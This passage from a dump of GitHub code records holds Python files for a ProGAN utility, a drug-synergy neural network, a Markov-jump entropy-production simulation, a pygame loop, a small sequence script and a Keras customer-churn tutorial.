2).sum(dim=input_dims, keepdim=True) + eps)\n return w / divisor\n\n\nclass Reshape(torch.nn.Module):\n def __init__(self, shape):\n super().__init__()\n self.shape = shape\n\n def forward(self, x):\n return x.view(*self.shape)\n\n\nclass ToColorTransform(object):\n def __call__(self, img):\n out = torch.cat([img] * 3, dim=0)\n return out\n\n\ndef pixel_norm(x, epsilon=1e-8):\n # This function is taken from ALAE (https://github.com/podgorskiy/ALAE/)\n return x * torch.rsqrt(torch.mean(x.pow(2.0), dim=1, keepdim=True) + epsilon)\n\n\n\nif __name__ == \"__main__\":\n layers = [Conv2dNormalizedLR(10, 10, 3, padding=1) for i in range(10)]\n for layer in layers:\n layer.reset_parameters()\n out = torch.normal(0, 1, (100, 10, 5, 5))\n for layer in layers:\n out = torch.nn.functional.leaky_relu(layer(out), 0.2)\n print(out.mean(), out.std(dim=0).mean())\n","repo_name":"Gerryflap/progan_experiments","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38020450896","text":"import pandas as pd\nimport numpy as np\nimport json\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Dropout, Input, concatenate, BatchNormalization, Activation\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom helper_funcs import normalize, progress\n\n\ndef data_loader(drug1_chemicals,drug2_chemicals,cell_line_gex,comb_data_name):\n print(\"File reading ...\")\n comb_data = pd.read_csv(comb_data_name, sep=\"\\t\")\n cell_line = pd.read_csv(cell_line_gex,header=None)\n chem1 = pd.read_csv(drug1_chemicals,header=None)\n chem2 = pd.read_csv(drug2_chemicals,header=None)\n synergies = np.array(comb_data[\"synergy_loewe\"])\n\n cell_line = np.array(cell_line.values)\n chem1 = np.array(chem1.values)\n chem2 = np.array(chem2.values)\n return chem1, chem2, cell_line, synergies\n\n\ndef prepare_data(chem1, chem2, cell_line, synergies, norm, train_ind_fname, val_ind_fname, test_ind_fname):\n print(\"Data normalization and preparation of train/validation/test data\")\n test_ind = list(np.loadtxt(test_ind_fname,dtype=np.int))\n val_ind = list(np.loadtxt(val_ind_fname,dtype=np.int))\n train_ind = list(np.loadtxt(train_ind_fname,dtype=np.int))\n\n train_data = {}\n val_data = {}\n test_data = {}\n train1 = np.concatenate((chem1[train_ind,:],chem2[train_ind,:]),axis=0)\n train_data['drug1'], mean1, std1, mean2, std2, feat_filt = normalize(train1, norm=norm)\n val_data['drug1'], mmean1, sstd1, mmean2, sstd2, feat_filtt = normalize(chem1[val_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n test_data['drug1'], mean1, std1, mean2, std2, feat_filt = normalize(chem1[test_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n train2 = np.concatenate((chem2[train_ind,:],chem1[train_ind,:]),axis=0)\n train_data['drug2'], mean1, std1, mean2, std2, feat_filt = normalize(train2, norm=norm)\n val_data['drug2'], mmean1, sstd1, mmean2, sstd2, feat_filtt = normalize(chem2[val_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n test_data['drug2'], mean1, std1, mean2, std2, feat_filt = normalize(chem2[test_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n\n train3 = np.concatenate((cell_line[train_ind,:],cell_line[train_ind,:]),axis=0)\n train_cell_line, mean1, std1, mean2, std2, feat_filt = normalize(train3, norm=norm)\n val_cell_line, mmean1, sstd1, mmean2, sstd2, feat_filtt = normalize(cell_line[val_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n test_cell_line, mean1, std1, mean2, std2, feat_filt = normalize(cell_line[test_ind,:],mean1, std1, mean2, std2, feat_filt=feat_filt, norm=norm)\n train_data['drug1'] = np.concatenate((train_data['drug1'],train_cell_line),axis=1)\n train_data['drug2'] = np.concatenate((train_data['drug2'],train_cell_line),axis=1)\n\n val_data['drug1'] = np.concatenate((val_data['drug1'],val_cell_line),axis=1)\n val_data['drug2'] = np.concatenate((val_data['drug2'],val_cell_line),axis=1)\n\n test_data['drug1'] = np.concatenate((test_data['drug1'],test_cell_line),axis=1)\n test_data['drug2'] = np.concatenate((test_data['drug2'],test_cell_line),axis=1)\n\n train_data['y'] = np.concatenate((synergies[train_ind],synergies[train_ind]),axis=0)\n val_data['y'] = synergies[val_ind]\n test_data['y'] = synergies[test_ind]\n print(test_data['drug1'].shape)\n print(test_data['drug2'].shape)\n return train_data, val_data, test_data\n\ndef generate_network(train, layers, inDrop, drop):\n # fill the architecture params from dict\n dsn1_layers = layers[\"DSN_1\"].split(\"-\")\n dsn2_layers = layers[\"DSN_2\"].split(\"-\")\n snp_layers = layers[\"SPN\"].split(\"-\")\n # contruct two parallel networks\n for l in range(len(dsn1_layers)):\n if l == 0:\n input_drug1 = Input(shape=(train[\"drug1\"].shape[1],))\n middle_layer = Dense(int(dsn1_layers[l]), activation='relu', kernel_initializer='he_normal')(input_drug1)\n middle_layer = Dropout(float(inDrop))(middle_layer)\n elif l == (len(dsn1_layers)-1):\n dsn1_output = Dense(int(dsn1_layers[l]), activation='linear')(middle_layer)\n else:\n middle_layer = Dense(int(dsn1_layers[l]), activation='relu')(middle_layer)\n middle_layer = Dropout(float(drop))(middle_layer)\n\n for l in range(len(dsn2_layers)):\n if l == 0:\n input_drug2 = Input(shape=(train[\"drug2\"].shape[1],))\n middle_layer = Dense(int(dsn2_layers[l]), activation='relu', kernel_initializer='he_normal')(input_drug2)\n middle_layer = Dropout(float(inDrop))(middle_layer)\n elif l == (len(dsn2_layers)-1):\n dsn2_output = Dense(int(dsn2_layers[l]), activation='linear')(middle_layer)\n else:\n middle_layer = Dense(int(dsn2_layers[l]), activation='relu')(middle_layer)\n middle_layer = Dropout(float(drop))(middle_layer)\n \n concatModel = concatenate([dsn1_output, dsn2_output])\n \n for snp_layer in range(len(snp_layers)):\n if len(snp_layers) == 1:\n snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(concatModel)\n snp_output = Dense(1, activation='linear')(snpFC)\n else:\n # more than one FC layer at concat\n if snp_layer == 0:\n snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(concatModel)\n snpFC = Dropout(float(drop))(snpFC)\n elif snp_layer == (len(snp_layers)-1):\n snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(snpFC)\n snp_output = Dense(1, activation='linear')(snpFC)\n else:\n snpFC = Dense(int(snp_layers[snp_layer]), activation='relu')(snpFC)\n snpFC = Dropout(float(drop))(snpFC)\n\n model = Model([input_drug1, input_drug2], snp_output)\n return model\n\ndef trainer(model, l_rate, train, val, epo, batch_size, earlyStop, modelName,weights):\n cb_check = ModelCheckpoint((modelName), verbose=1, monitor='val_loss',save_best_only=True, mode='auto')\n model.compile(loss='mean_squared_error', optimizer=keras.optimizers.Adam(lr=float(l_rate), beta_1=0.9, beta_2=0.999, amsgrad=False))\n model.fit([train[\"drug1\"], train[\"drug2\"]], train[\"y\"], epochs=epo, shuffle=True, batch_size=batch_size,verbose=1, \n validation_data=([val[\"drug1\"], val[\"drug2\"]], val[\"y\"]),sample_weight=weights,\n callbacks=[EarlyStopping(monitor='val_loss', mode='auto', patience = earlyStop),cb_check])\n\n return model\n\ndef predict(model, data):\n pred = model.predict(data)\n return pred.flatten()\n","repo_name":"hikuru/matchmaker","sub_path":"MatchMaker.py","file_name":"MatchMaker.py","file_ext":"py","file_size_in_byte":6693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3205203906","text":"# Odd-parity Markov-jump process simulation\n# Reference: https://journals.aps.org/prl/abstract/10.1103/PhysRevLett.110.050602\nimport numpy as np\n\n\ndef transition_rates(hv, hmv, fv, fmv, N=4):\n \"\"\"outputs the matrix for the dynamics of Markovian jump process with odd-parity in a N-site ring.\n Parameters: hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float, optional\n the number of sites (default: 4 )\n return : 2D array-like, of shape (2N, 2N)\n Matrix for the dynamics of a state vector [(1,v),...,(N,v),(1,-v),...,(N,-v) ]\n \"\"\"\n Mv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n Mv[i][i - 1] = hv\n\n Mmv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n Mmv[i - 1][i] = hmv\n\n OFv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n OFv[i][i] = fv\n\n OFmv = np.zeros((N, N))\n\n for i in range(N):\n if i >= 0: # 1 ~ N\n OFmv[i][i] = fmv\n\n # Final\n result_mat = np.zeros((2 * N, 2 * N))\n\n result_mat[:N, :N] = Mv\n result_mat[N:, N:] = Mmv\n result_mat[N:, :N] = OFv\n result_mat[:N, N:] = OFmv\n for i in range(2 * N):\n result_mat[i, i] = -sum(result_mat[:, i])\n\n return result_mat\n\n\ndef jump_probs(w):\n mask = 1 - np.eye(w.shape[0])\n w = mask * w\n mean_waiting_time = 1 / np.sum(w, axis=0)[np.newaxis, :]\n return w * mean_waiting_time\n\n\ndef visit_probs(w):\n jump_probabilities = jump_probs(w)\n eigenvalues, eigenvectors = np.linalg.eig(jump_probabilities)\n max_eigen = max(eigenvalues.real)\n max_index = np.where(eigenvalues == max_eigen)\n\n visit_state = eigenvectors[:, max_index]\n if sum(visit_state) < 0:\n visit_state = -visit_state\n visit_state = visit_state / sum(visit_state)\n assert visit_state.imag.any() == 0, \"imaginary!\"\n return visit_state.real.squeeze()\n\n\ndef p_ss(hv, hmv, fv, fmv, N):\n \"\"\"outputs the steady state vector of Markovian jump process with odd-parity in a N-site ring.\n Parameters: hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n return : 1D array-like, of shape (2N)\n A state vector [(1,v),...,(N,v),(1,-v),...,(N,-v) ]\n \"\"\"\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n eigenvalues, eigenvectors = np.linalg.eig(tran_mat)\n max_eigen = max(eigenvalues.real)\n max_index = np.where(eigenvalues == max_eigen)\n\n assert int(max_eigen) == 0, \"the dynamics diverges!\"\n\n steady_state = eigenvectors[:, max_index]\n if sum(steady_state) < 0:\n steady_state = -steady_state\n steady_state = steady_state / sum(steady_state)\n assert steady_state.imag.any() == 0, \"imaginary!\"\n return steady_state.real\n\n\ndef simulation(num_trjs, trj_len, hv, hmv, fv, fmv, N, seed=0):\n \"\"\"Simulation with Gillespie algorithm of an odd-parity Markov jump process\n each trajectory has own time series\n\n Args:\n num_trjs : Number of trajectories you want\n trj_len : length of trajectories\n hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n seed : seed of random generator (default: 0)\n\n Returns: 2d-array of shape (num_trjs, trj_len)\n trajectories of an odd-parity Markov jump process\n \"\"\"\n np.random.seed(seed)\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n trajs = []\n times = []\n ti = np.zeros((num_trjs,))\n p_ss_sq = np.squeeze(p_ss(hv, hmv, fv, fmv, N))\n states = np.random.choice(np.size(p_ss_sq), size=(num_trjs,), p=p_ss_sq)\n trajs.append(np.copy(states))\n times.append(ti)\n\n for i in range(trj_len - 1):\n time_interval = np.random.uniform(0.0, 1.0, size=(num_trjs, 2 * N))\n # calculates time intervals !\n for (ens_idx, dest_idx), rand_val in np.ndenumerate(time_interval):\n tran_rate = tran_mat[dest_idx, states[ens_idx]]\n if tran_rate == 0 or states[ens_idx] == dest_idx:\n time_interval[ens_idx, dest_idx] = np.nan\n else:\n time_interval[ens_idx, dest_idx] = -np.log(rand_val) / tran_rate\n update_ti = np.copy(ti)\n next_states = np.copy(states)\n for i, each_intervals in enumerate(time_interval):\n smallest_interval = np.nanmin(each_intervals)\n small_idx = np.where(each_intervals == smallest_interval)\n next_states[i] = small_idx[0]\n update_ti[i] += smallest_interval\n assert (\n len(each_intervals[small_idx]) == 1\n ), \"more than one... or none \" + str(each_intervals[small_idx])\n\n assert len(time_interval) == num_trjs, \"wrong! \" + str(len(time_interval))\n\n trajs.append(np.copy(next_states))\n times.append(np.copy(update_ti))\n states = np.copy(next_states)\n ti = np.copy(update_ti)\n\n return np.array(trajs).T, np.array(times).T\n\n\ndef ep_rate(hv, hmv, fv, fmv, N):\n \"\"\"Analytic average entropy production per step\n\n Args:\n hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n\n Returns:\n analytic average entropy production per step\n \"\"\"\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n stationary = p_ss(hv, hmv, fv, fmv, N)\n ent_rate = 0\n for i, prob_i in enumerate(stationary):\n for j, tr in enumerate(tran_mat[:, i]):\n tr_rev = tran_mat[i - N, j - N]\n if tr != 0 and i != j:\n ent_rate += prob_i * tr * np.log(tr / tr_rev)\n if i == j:\n ent_rate += prob_i * (tr - tr_rev)\n return ent_rate[0, 0]\n\n\ndef analytic_etpy(traj, time_traj, hv, hmv, fv, fmv, N):\n \"\"\"Analytic stochastic entropy production for given trajectories.\n this code is for simulationv2\n\n Args:\n traj : trajectories, shape=(num_trjs, trj_len)\n hv : float\n transition rate from (n,v) to (n+v,v)\n hmv: float\n transition rate from (n,-v) to (n-v,-v)\n fv : float\n transition rate from (n,v) to (n,-v)\n fmv: float\n transition rate from (n,-v) to (n,+v)\n N : float\n the number of sites\n\n Returns:\n 1d-array of shape (num_trjs, trj_len - 1)\n \"\"\"\n\n tran_mat = transition_rates(hv, hmv, fv, fmv, N=N)\n mask = 1 - np.eye(tran_mat.shape[0])\n tau = 1 / np.sum(mask * tran_mat, axis=0)\n wtd = lambda t, n: np.exp(-t / tau[n]) / tau[n]\n P = jump_probs(tran_mat)\n R = visit_probs(tran_mat)\n\n waiting_time = time_traj[:, 1:] - time_traj[:, :-1]\n ent_wtd = np.log(\n wtd(waiting_time, traj[:, :-1]) / wtd(waiting_time, traj[:, :-1] - N)\n )\n ent_sys = np.log(R[traj[:, :-1]] / R[traj[:, 1:]])\n ent_aff = np.log(\n P[traj[:, 1:], traj[:, :-1]] / P[traj[:, :-1] - N, traj[:, 1:] - N]\n )\n ent = ent_aff + ent_wtd + ent_sys\n ent_rate = ent.sum(-1) / time_traj[:, -1]\n return ent, ent_rate\n","repo_name":"kdkyum/odd_neep","sub_path":"data/odd_markov_jump.py","file_name":"odd_markov_jump.py","file_ext":"py","file_size_in_byte":8061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17040411776","text":"from Bin.Physics import *\nfrom Bin.Init import *\ndef MainLoop():\n\n\n\n GameWasStopped_=0\n done=False\n GameIs='Running'\n TimeOfDeath=0\n amount=0\n StartTime=time.time()\n\n while not done:\n\n # print(GameIs, GameWasStopped_)\n\n #\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n done = True\n if TurnAI == 0 or AmountOfBalls != 1:\n BigRectangle.control(e)\n\n #\n if not(TurnAI == 0 or AmountOfBalls != 1):\n BigRectangle.autocontrol(Balls[0].pos[0] + Balls[0].width/2, BigRectangle.pos[0] + BigRectangle.width/2)\n\n # Проверка На НеКонецИгры\n from Classes.Ball import GameIs\n if(GameIs == 'Stopped' and GameWasStopped_==0):\n for i in range(len(Balls)):\n Balls[i].speed[0]=0\n Balls[i].speed[1] = 0\n\n final_Time=str(round((time.time() - StartTime - 1), 1))\n LastScores.AddScore(final_Time)\n HighScores.AddScore(final_Time)\n HighScores.sort()\n #LastScores.sort()\n FinishText.update_text(\"Game Has been finished with the score: \" + final_Time)\n GameWasStopped_=1\n FullRenderCycle()\n TimeOfDeath= (round((time.time() - StartTime - 1), 1))\n # Проверка На НеКонецИгры\n '''\n if GameWasStopped_== 1 :\n final_Time = str((round( TimeOfDeath-(time.time() - StartTime - 1) + 5, 1)))\n if float(final_Time) <= 0:\n\n #Balls = []\n Balls.pop()\n done=True\n StartTime=time.time()\n\n RestartText.update_text(\"Game Will Restart in \" + final_Time +\" seconds\")\n FullRenderCycle()\n '''\n\n if(amount > fps and GameIs == 'Running'):\n FullRenderCycle() # Отрисовка\n FullPhysCycle() # Проверка Физики\n\n\n #Fps Writter\n amount+=1\n if ((time.time() - StartTime) / amount) != 0:\n ActualFPS = ((1 / ((time.time() - StartTime) / amount)))\n else:\n ActualFPS=fps\n decre = (1000/(ActualFPS) ) - (1000/fps)\n pygame.time.wait(int(1000/fps - fps*decre))\n if((amount%(fps*2)) == 0): print( 'fps =', round(ActualFPS,2) )\n #Fps Writter\n\n\n","repo_name":"DortyTheGreat/Code-Samples","sub_path":"Pyhton/Pixels/Bin/MainCycle.py","file_name":"MainCycle.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35261266659","text":"def nfinder(x):\r\n while x%2 == 0:\r\n x = x/2\r\n return int((x+1)/2)\r\n\r\ndef zerofinder(x):\r\n if x % 2 == 1 or x < 3:\r\n return '​'\r\n dividing_point = nfinder(x)\r\n totalzeros = int(((x - 3)/2))\r\n firstsetofzeros = dividing_point - 1\r\n print(str(firstsetofzeros) + '' + ',', end='')\r\n print(str(totalzeros - firstsetofzeros + 1))\r\n\r\nfor i in range(3,25):\r\n if i % 2 == 0:\r\n print(str(i) + ' ', end='')\r\n zerofinder(i)","repo_name":"HakanIchoz/zeros-in-A119974","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5555206669","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 22 20:53:20 2019\r\n\r\n@author: Sefa3\r\n\"\"\"\r\n\r\n#-----------------------Part 1 : Data Preprocessing----------------------------\r\n\"\"\" \r\nThe problem that we are about to deal with is a classification problem.\r\nWe have several independent variables, like credit score, the balance, \r\nthe number of products...\r\nAnd based on these independent variables,\r\nwe are trying to predict which customers are leaving the bank.\r\nANN can do a terrific job at doing this,\r\nand making that kind of predictions...\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\n* Theano Libray\r\nTheano is an open source numerical computations library,\r\nvery efficient for fast numerical computations.\r\nAnd that is based on numpy syntax.\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\n* Tensorflow Library\r\nTensorflow is another numerical computations library\r\nthat runs very fast computations.\r\nAnd that can run our CPU or GPU\r\nCPU : Central Processing Unit\r\nGPU : Graphical Processing Unit\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\n* Keras Library\r\nThe Keras library is an amazing library to build deep learning models,\r\nin a few lines of code.\r\nKeras is a library based on Theano and Tensorflow,\r\nand exactly as we use scikit-learn to build very efficiently \r\nmachine learning models.\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n#------------------------------------------------------------------------------\r\n# Importing the dataset\r\ndataset = pd.read_csv('Churn_Modelling.csv')\r\n#------------------------------------------------------------------------------\r\n# the key thing to understand here is that\r\n# all these variables here are independent variables.\r\n# but the last columns is our dependent variable.\r\n# 1 : exited, 0 : stayed.\r\ndataset.head()\r\nX = dataset.iloc[:, 3:13].values\r\ny = dataset.iloc[:, 13:14].values\r\nX\r\ny\r\n#------------------------------------------------------------------------------\r\n# Encoding categorical data\r\n# Encoding the Independent Variable\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\n\r\nlabelencoder_X1 = LabelEncoder()\r\nX[:, 1] = labelencoder_X1.fit_transform(X[:, 1])\r\nX\r\n\r\nlabelencoder_X2 = LabelEncoder()\r\nX[:, 2] = labelencoder_X2.fit_transform(X[:, 2])\r\nX\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\nto create dummy variables\r\nour categorical variables are not ordinal\r\nthat means that there is no relational order\r\nbetween our categorical variables.\r\nFrance is not higher than Germany, ...\r\nto avoid dummy variable trap;\r\n\"\"\"\r\nonehotencoder = OneHotEncoder(categorical_features = [1])\r\nX = onehotencoder.fit_transform(X).toarray()\r\n#------------------------------------------------------------------------------\r\n# first 3 variables : dummy variables\r\nX = X.astype('float64')\r\n# to avoid dummy variable trap,\r\n# we need to drop the first column.\r\nX = X[:, 1:]\r\n#------------------------------------------------------------------------------\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, \r\n random_state = 0)\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\nFeature Scaling\r\nwe need to apply feature scaling\r\nto ease all these calculations.\r\nbecause, we don't want to have one independent variable\r\nthat dominating another one.\r\n\"\"\"\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\n#------------------------------------------------------------------------------\r\n#______________________________________________________________________________\r\n\r\n#--------------------Part 2 : Now let's make the ANN!--------------------------\r\n# Importing the Keras libraries and packages\r\n# import tensorflow as tf\r\n\r\n# to initialize our neural network.\r\n# from tensorflow.keras.models import Sequential\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n# this is the model will use to create layers in our ANN.\r\n# from tensorflow.keras.layers import Dense\r\n#------------------------------------------------------------------------------\r\n# Initializing the ANN\r\nclassifier = Sequential()\r\n#------------------------------------------------------------------------------\r\n\"\"\"\r\nAdding the input layer and the first hidden layer\r\nwe'll choose the 'rectifier activation function' for the hidden layers\r\nand we'll choose the 'sigmoid activation function' for the output layer.\r\n\"\"\"\r\n# output_dim = (11 + 1) / 2 = 6\r\nclassifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n#------------------------------------------------------------------------------\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(6, activation = 'relu'))\r\n#------------------------------------------------------------------------------\r\n# Adding the output layer\r\nclassifier.add(Dense(1, activation = 'sigmoid'))\r\n#------------------------------------------------------------------------------\r\n# Compiling the ANN\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy',\r\n metrics = ['accuracy'])\r\n#------------------------------------------------------------------------------\r\n# Fitting the ANN to the Training set\r\nclassifier.fit(X_train, y_train, batch_size = 10, epochs = 100)\r\n#------------------------------------------------------------------------------\r\n#______________________________________________________________________________\r\n\r\n#----------Part 3 : Making the predictions and evaluating the model------------\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\ny_pred = (y_pred > 0.5)\r\n# Making the Confusion Matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\naccuracy = (cm[0, 0] + cm[1, 1]) / np.sum(cm)\r\n#------------------------------------------------------------------------------\r\n#______________________________________________________________________________\r\n\r\n#---------------Part 4 : Predicting a single new observation-------------------\r\n\"\"\"\r\nPredict if the customer with the following information will leave the bank:\r\n Geography : France = [0, 0] <-- corresponds to\r\n Credit Score : 600\r\n Gender : Male = [1] <-- corresponds to\r\n Age : 40\r\n Tenure : 3\r\n Balance : 60000\r\n Number of Products : 2\r\n Has Credit Card : Yes = [1] <-- corresponds to\r\n Is Active Member : Yes = [1] <-- corresponds to\r\n Estimated Salary : 50000\r\n\"\"\"\r\n\r\nmy_array = np.array([[0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]])\r\nnormal_array = sc.transform(my_array) # to normalize \r\nnew_prediction = classifier.predict(my_array)\r\nnew_y_pred = (new_prediction > 0.5)\r\n#______________________________________________________________________________\r\n\r\n#-------------Part 5 : Evaluating, Improving and Tuning the ANN----------------\r\n# Evaluating the ANN\r\n'''\r\nto fix this variance problem;\r\nk-Fold Cross Validation fix it by splitting the training set\r\ninto 10 folds when K = 10, and most of the time K = 10\r\nand we train our model on 9-folds and we test it on the\r\nlast remaining fold.\r\nthere we take 10 different combination of 9-folds to train\r\na model and 1-fold to test it.\r\nthat means we can train the model and test the model\r\non 10 combinations of training and test sets.\r\nAnd that will give us a much better idea of the model\r\nperformance because, we take an average of different\r\naccuracies of the 10 evaluations and also compute\r\nthe standart deviation to have a look at the variance.\r\nSo eventually, our analysis will be much more relevant.\r\n'''\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\ndef build_classifier():\r\n classifier = Sequential()\r\n classifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n classifier.add(Dense(6, activation = 'relu'))\r\n classifier.add(Dense(1, activation = 'sigmoid'))\r\n classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy',\r\n metrics = ['accuracy'])\r\n return classifier\r\n\r\nclassifier_cv = KerasClassifier(build_fn = build_classifier,\r\n batch_size = 10, epochs = 100, verbose = 0)\r\n\r\naccuracies = cross_val_score(estimator = classifier_cv, X = X_train,\r\n y = y_train, cv = 10, n_jobs = 1)\r\n\r\nmean = accuracies.mean()\r\nvariance = accuracies.std()\r\n\"\"\"\r\nwe are in 'Low Bias Low Variance'.\r\nmeans, best accuracy low varince\r\naccuracy : % 85.9\r\nvariance : % 1.22\r\n\"\"\"\r\n#------------------------------------------------------------------------------\r\n# Improving the ANN\r\n\"\"\"\r\nDropout Regularization:\r\nit is the solution for overfitting in deep learning.\r\nOverfitting is when your model was trained too much\r\non the training set, too much that it becomes much less\r\nperformance on the test set and we can observe this\r\nwhen we have large difference of accuracies between\r\ntraining set and the test set.\r\nGenerally, when overfitting happens, you have a much\r\nhigher accuracy on the training set than the test set.\r\nAnd another way to detect overfitting is when you\r\nobserve high variance when applying k-fold cv\r\nbecause indeed, when it's overfitted on the training\r\nset, that is when your model learn too much and\r\nthis may cause your model won't succeed on 'other' test\r\nsets because the correlations learned too much.\r\n\"\"\"\r\n# Dropout Regularization to reduce overfitting if needed.\r\nfrom keras.layers import Dropout\r\n\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\nclassifier.add(Dropout(p = 0.1))\r\n\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(6, activation = 'relu'))\r\nclassifier.add(Dropout(p = 0.1))\r\n\r\n# Adding the output layer\r\nclassifier.add(Dense(1, activation = 'sigmoid'))\r\nclassifier.add(Dropout(p = 0.1))\r\n\r\nclassifier.compile(optimizer = 'adam', loss = 'binary_crossentropy',\r\n metrics = ['accuracy'])\r\n\r\nclassifier.fit(X_train, y_train, batch_size = 10, epochs = 100)\r\n#------------------------------------------------------------------------------\r\n# Tuning the ANN\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\ndef build_classifier(optimizer):\r\n classifier = Sequential()\r\n \r\n classifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n classifier.add(Dense(6, activation = 'relu'))\r\n classifier.add(Dense(1, activation = 'sigmoid'))\r\n \r\n classifier.compile(optimizer = optimizer, \r\n loss = 'binary_crossentropy',\r\n metrics = ['accuracy']\r\n )\r\n return classifier\r\n\r\nclassifier_cv = KerasClassifier(build_fn = build_classifier)\r\n\r\nparameters = {'batch_size' : [25, 32],\r\n 'epochs' : [100, 500],\r\n 'optimizer' : ['adam', 'rmsprop']\r\n }\r\n\r\ngrid_search = GridSearchCV(estimator = classifier_cv,\r\n param_grid = parameters,\r\n scoring = 'accuracy',\r\n cv = 10\r\n )\r\n\r\ngrid_seach_cv = grid_search.fit(X = X_train, y = y_train)\r\nbest_parameters = grid_seach_cv.best_params_\r\nbest_accuracy = grid_seach_cv.best_score_\r\n\r\n# best_parameters = {'batch_size': 32, 'epochs': 500, 'optimizer': 'rmsprop'}\r\n# best_accuracy = 0.860125\r\n#------------------------------------------------------------------------------\r\nclassifier = Sequential()\r\n\r\n# Adding the input layer and the first hidden layer\r\nclassifier.add(Dense(6, activation = 'relu', input_shape = (11, )))\r\n\r\n# Adding the second hidden layer\r\nclassifier.add(Dense(6, activation = 'relu'))\r\n\r\n# Adding the output layer\r\nclassifier.add(Dense(1, activation = 'sigmoid'))\r\n\r\nclassifier.compile(optimizer = 'rmsprop', loss = 'binary_crossentropy',\r\n metrics = ['accuracy'])\r\n\r\nclassifier.fit(X_train, y_train, batch_size = 32, epochs = 100)\r\n\r\ny_pred_tuned = classifier.predict(X_test)\r\ny_pred_tuned = (y_pred_tuned > 0.5)\r\n\r\ncm_tuned = confusion_matrix(y_test, y_pred_tuned)\r\naccuracy_tuned = (cm_tuned[0, 0] + cm_tuned[1, 1]) / np.sum(cm_tuned)\r\n\r\n# accuracy_tuned : % 86.4\r\n#______________________________________________________________________________","repo_name":"Sefa314159/Deep-Learning-A-Z-Hands-On-Artificial-Neural-Networks","sub_path":"1. Artificial Neural Networks/ann_sefa.py","file_name":"ann_sefa.py","file_ext":"py","file_size_in_byte":12951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13351157544","text":"import 